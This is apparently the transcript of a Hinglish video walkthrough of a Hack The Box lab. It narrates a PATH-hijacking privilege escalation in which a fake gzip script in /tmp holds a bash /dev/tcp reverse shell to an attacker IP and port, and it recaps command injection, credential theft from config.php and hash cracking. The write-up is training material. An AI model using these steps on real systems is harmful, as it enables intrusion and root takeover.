क्या कर सकते हो, उस बाइनरी को हाईजैक कर सकते हो। नाउ व्हाट एग्जैक्टली आई एम सेइंग, नॉट एग्जैक्टली हाईजैकिंग। सो ये काम कैसे करता है, देखो अभी मैं अगर करूँ इको डॉलर पाथ, सो हमारा जो सिस्टम का पाथ वेरिएबल है वो दिखेगा। सो अभी देखो ये बेसिकली काम कैसे कर रहा है, जैसे यहाँ पे gzip को कॉल जा रहा है। तो gzip का कॉल मतलब क्या होता है कि इट विल ट्राई टू चेक फर्स्ट इन यूज़र स्लैश लोकल स्लैश एसबिन। अगर यहाँ पे उसको ये बाइनरी फाइल नहीं मिलता तो वो कहाँ चेक करेगा, स्लैश यूज़र स्लैश लोकल स्लैश बिन। यहाँ पे भी नहीं मिलता है तो स्लैश यूज़र स्लैश एसबिन। ऐसे करते करते वो यहाँ तक आके चेक करेगा कि इसमें कहीं पे मिलता है। जहाँ पे उसको फर्स्ट इंस्टेंस मिलेगा gzip का, वो उसके अंदर का कोड जो भी है वो रन करेगा। सो अभी हम लोग यहाँ पे क्या करने वाले, हम लोग खुद का gzip फाइल बनाने का कोशिश करेंगे, ठीक है। सो आप ये किसी भी बाइनरी के साथ ट्राई कर सकते हो। अगर आपको कभी ऐसा इनकाउंटर होता है वाइल सॉल्विंग अ लैब, यू कैन ट्राई टू डू दिस, कि आप वो बेसिकली फ़ाइल के अंदर का कोड ही चेंज, मतलब खुद का फाइल बनाओ, उसके अंदर एक कोड लिखो जहाँ से आपको लिसन करने का चांस मिले एंड देन यू कैन ट्राई टू एग्जीक्यूट दैट पर्टिकुलर gzip फाइल एज रूट। बट बिफोर दैट आपको आपका जो करंट फोल्डर है वो पाथ में ऐड करना पड़ेगा। सो ऑफकोर्स मेरे को ये फोल्डर में रीड एंड राइट का परमिशंस नहीं रहेगा, तो मैं क्या करता हूँ, सॉरी राइट का परमिशंस, रीड का तो है, सी डी स्लैश टेम्प में जाता हूँ एंड इसके ऊपर हम लोग अभी यहाँ पे लिखेंगे। सो व्हाट आई कैन डू, सिंपली से वी आई एंड gzip, बाइनरी का नाम ध्यान से डालना, सेम टू सेम होना चाहिए, एंड एंटर करूँगा। एंड अभी यहाँ पे मैं इंसर्ट मोड में जाऊँगा एंड मेरे को अभी यहाँ पे कोड लिखना है। सो मैं कैसे लिखूँगा, सबसे पहले बैश स्क्रिप्ट मेरे को रन करना है। सो आई विल से हैश एक्सक्लेमेशन स्लैश बिन स्लैश बैश, ठीक है। ये बैश स्क्रिप्ट का शुरुआत रहता है, जिन्होंने भी बैश स्क्रिप्टिंग किया उनको पता रहेगा। विदाउट दिस स्क्रिप्ट कैन नॉट बी रन एज एन बैश, इसके लिए हम लोग बिन स्लैश बैश डालते हैं। उसके बाद अभी मेरे को, हमने जो पहले पेन टेस्ट का यूज़ किया था सेम चीज़ हम लोग यूज़ करने वाले हैं। उसके लिए हम लोग को सबसे पहले क्या करना पड़ेगा, बैश -c डालना पड़ेगा, ठीक है। बैश -c डाला, सिंगल कोट। अभी यहाँ पे हम लोग को पेन टेस्ट वाला कोड डालना है, तो उसको कॉपी कर लेता है एंड cmd में जाके हम लोग यहाँ पे पेस्ट कर देंगे, देन सिंगल कोट करके क्लोज करना है। अब यहाँ पे चेंजेस क्या क्या करना है, सबसे पहले हमारा IP एड्रेस हम लोग चेंज कर देंगे, दैट इज़ अपना अटैकर का IP एड्रेस, दैट इज़ 10.10.14.6 परफेक्ट। एंड पोर्ट नंबर 8080 रख सकते हो, बट हमारा 8080 पे ऑलरेडी बब स्विच चालू है, सो मैं इसको रखता हूँ 8989, फाइन। सिंपल कमांड है, मैंने कुछ ज़्यादा नहीं किया, मैंने क्या लिखा है इसे, एक्सक्लेमेशन hash exclamation slash bin slash bash hyphen c bash hyphen i ampersand slash dev tcp 10.10.14.6 and then port number। ये बेसिकली कैसे काम करता है ये मैंने प्रीवियस वीडियोस में भी बताया, वहाँ से देख सकते हो, ठीक है। एंड अभी हम लोग को इसको सेव करना है, तो मैं कैसे करूँगा, escape::wq राइट एंड क्विट।
एंटर करूँगा। अभी अगर मैं कैट जी जिप करता हूँ, सो यहाँ पे हम लोग को प्रॉपर कोड दिखाई दे रहा है। सो अभी हम लोग को सबसे इम्पॉर्टेंट चीज़ करना है, हम लोग को यहाँ पे हमारा जो करंट फोल्डर है उसको पाथ में ऐड करना है। सो हम लोग कैसे कर सकते हैं, वी विल सिंपली से एक्सपोर्ट पाथ, पाथ इक्वल्स टू स्लैश टेम्प, जो कि हमारा करंट फोल्डर है, उसका नाम कोलन डॉलर पाथ। सो बिफोर डूइंग दिस एक काम करते हैं, हम लोग पहले पाथ वेरिएबल को नॉर्मली देखते हैं, ठीक है। कैसे देखेंगे, इको डॉलर पाथ, एंटर, ठीक है। पाथ वेरिएबल को ध्यान से देखो, क्या है यहाँ पे यूज़र लोकल स्लैश एस बी। अभी हम लोग करेंगे एक्सपोर्ट पाथ इक्वल्स टू स्लैश टेम्प कोलन डॉलर पाथ, सही है। अभी एंटर करता हूँ, कमांड एग्जीक्यूट होगा। अभी मैं वापस इको करता हूँ, सी द डिफरेंस। यहाँ पे क्या था, यूज़र लोकल एस बिन था, यहाँ पे क्या गया स्लैश टेम्प। तो अभी नेक्स्ट टाइम जब वो जी जिप को रन करेगा तो सबसे पहले किस में फाइंड करेगा, टेम्प में। और टेम्प में हम लोग ने क्या करके रखा है, हम लोग ने बेसिकली रिवर्स शेल लेने का कोड डाल के रखा है। तो मैं सबसे पहले यहाँ पे नेट कैट -lvnp 8989 पोर्ट डाला था, लेट्स चेक, इट वॉज 8989 पे जाते एंटर करते हैं, यहाँ पे लिसन चालू कर दिया हम लोग ने। अभी मैं करूँगा सूडो एंड हम लोग को वो पाथ देना। क्या पाथ था, स्क्रिप्ट का पाथ देना बेसिकली। इट वॉज इनसाइड ऑप्ट स्लैश स्क्रिप्ट्स, ठीक है। सो दैट इज स्लैश ऑप्ट स्लैश स्क्रिप्ट्स एंड देन फाइल का नाम देना एंड एंटर करूँगा, ठीक है। रन हो गया। अभी अगर मैं यहाँ पे नेटकैट पे जाऊँ, कुछ हुआ तो नहीं है, ऑफकोर्स नहीं हुआ है। यहाँ पे क्या गलत किया हम लोग ने, वी नीड टू चेक दैट। 10.10.14.6 आई पी एड्रेस बिल्कुल सही डाला है, 8989 सही है। क्या हम लोग को यहाँ पे डॉट देना चाहिए था बस, यू कैन ट्राई दिस। अगर मैं एक्सपोर्ट पे जाऊँ वापस, ठीक है। सो मैं इंस्टेड ऑफ स्लैश टेम्प की जगह पे अगर मैं सिर्फ डॉट देता हूँ एंड एंटर करता हूँ, एंड अभी अगर मैं पाथ वेरिएबल को देखूँ, सो यू कैन सी यहाँ पे डॉट आ गया पहले। एंड अभी अगर मैं उसको एग्जीक्यूट करूँ, sudo स्लैश ऑप्ट स्लैश स्क्रिप्ट, एंड अगर मैं परमिशंस नहीं चेंज किया हम लोग ने gzip का, राइट। सो वी नीड टू चेंज द परमिशंस, chmod +x gzip, ठीक है। तो अभी हम लोग ने परमिशंस चेंज किया है, ठीक है। परमिशंस नहीं दिया था हम लोग ने बेसिकली। सो देन इफ वी सिंपली रन दिस फाइल नाउ, तो अभी हम लोग को मिलना चाहिए। सी यहाँ पे ये स्टक हो गया, पहले स्टक नहीं हुआ क्योंकि परमिशंस नहीं था। अभी अगर मैं यहाँ पे जाऊँ, शुड सी वी आर लॉग इन एज अ रूट, ठीक है। सी डी डॉट डॉट करेंगे, फिर सी डी परसेंटाइल अगर मैं करूँ एंड एल यहाँ पे यू कैन सी द यूज़र डॉट टी एक्स टी वाला फ्लैग एंड अब सो वी गॉट द एक्सेस टू द रूट यूज़र, ठीक है। एंड वी कैन सी वी कैन एक्सेस एवरीथिंग एज ऑन रूट। यहाँ पे यूज़र डॉट टी एक्स टी फ्लैग भी हम लोग को दिख रहा है। एंड या सो बस ये लैब के लिए इतना ही था, बहुत सिंपल लैब था। यहाँ पे हम लोग ने 2-3 चीज़ सीखा, इम्पॉर्टेंट चीज़ें था वो, एंड आपको बहुत टाइम ये चीज़ें फेस करने को आएगा। सो यू कैन डू दिस, प्रैक्टिस दिस लैब 1 टाइम और 2 टाइम, एंड नेक्स्ट टाइम जब आपके सामने कोई ऐसा सिनेरियो आएगा, सो यू कैन ईजीली टैकल दैट लैब, ठीक है। सो हम लोग ने क्या किया, हम लोग एक बार ओवरव्यू कर लेते हैं वापस से। हम लोग ने बेसिक चीज़ें स्टार्ट किया, वी स्टार्टेड विद द nmap, वी सॉ द वेबसाइट, देन वी लर्न अ न्यू वेब एप्लीकेशन अटैक, दैट इज एग्जीक्यूशन, basically EAR, short form execution after redirection, where we were able to see the source code of the page in the response. So हम लोग ने उसका status code change किया from redirection to 200, okay, that is success। and हम लोग को पेज मिला, that page was having option to create a user, हम लोग ने यूज़र को create किया, then we logged in with that user, we saw an option for basically downloading a log file where there was one parameter, and before that जब हम लोग फाइल्स को रीड कर रहे थे तो logs.php में हम लोग को पता ऐसा चला था कि वो जो delim करके पैरामीटर है, दैट इज़ यूज इन अ पर्टिकुलर
फॉर्मेट जहाँ पे एक कमांड एग्जीक्यूशन हो रहा था, तो हम लोग ने सेमी कोलन देखे, मतलब वो कमांड को वहीं पे ख़त्म करके वी ट्राई टू एग्जीक्यूट आर कमांड, दैट इज स्लिप कमांड हम लोग ने ट्राई किया एंड वो स्लिप हो गया था। सो आफ्टर दैट हम लोग ने सिंपल रिवर्स शेल का कोड डाला, वी चेंज आर IP एड्रेस, वहाँ पे IP एड्रेस को चेंज किया एंड देन वी गॉट शेल टू www-data। ऑफकोर्स हमारे पास अभी तक यूज़र का फ्लैग था नहीं, बट हम लोग को बेसिक शेल मिल गया था। देन व्हाट वी सॉ, हमारे पास क्रेडेंशियल्स मिले थे config.php के अंदर, उसके थ्रू हम लोग को SQL का एक्सेस मिला, वी गॉट user hash there, we cracked it, we got access to the user, when we saw the user.txt file, user का flag हम लोग को वहाँ पे मिला। then sudo ifnl करने के बाद we saw script that is running by root, we were having a read permission to that, हम लोग ने read किया and we saw कि it is using gzip to run some particular commands। then we basically we can say we hijack that gzip file, we create our own gzip file, we add that folder path to a path environment variable, and when next time when we are running that basically bash script which was run as a user, when you run that with the help of sudo, we got the access to the root user। it was a really simple lab, right? so ये lab के लिए बस इतना ही था। आई होप आपको पसंद आया होगा ये चीज़ें, एंड मेक श्योर कि आप ये लैब आपके हैक द बॉक्स में सॉल्व करो। लेट मी नो आपको वीडियोस कैसे लग रहा है, आई एम ट्राइंग माई बेस्ट टू एक्सप्लेन यू। And yep, see you in the next video. Thank you guys, thank you for watching. Don't forget to like, share and subscribe.